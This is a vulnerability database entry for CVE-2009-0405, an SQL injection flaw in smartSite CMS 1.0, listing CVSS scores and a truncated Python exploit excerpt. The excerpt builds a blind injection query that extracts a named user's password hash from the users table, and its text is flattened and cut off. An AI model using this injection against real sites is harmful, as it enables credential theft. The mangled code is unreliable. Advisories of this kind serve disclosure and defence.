7.5
CVSSv2

CVE-2009-0405

Published: 03/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in articles.php in smartSite CMS 1.0 allows remote malicious users to execute arbitrary SQL commands via the var parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

smartsitecms smartsitecms 1.0

Exploits

#!/usr/bin/python import sys import re from socket import * class exploit: def __init__(self,host,path,user): selfhost=host selfpath=path selfuser=user selfreg=recompile("<!-- END COMMENT FORM -->") def set_query(self,n,ch): selfquery="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+selfuser+"'),"+str(n ...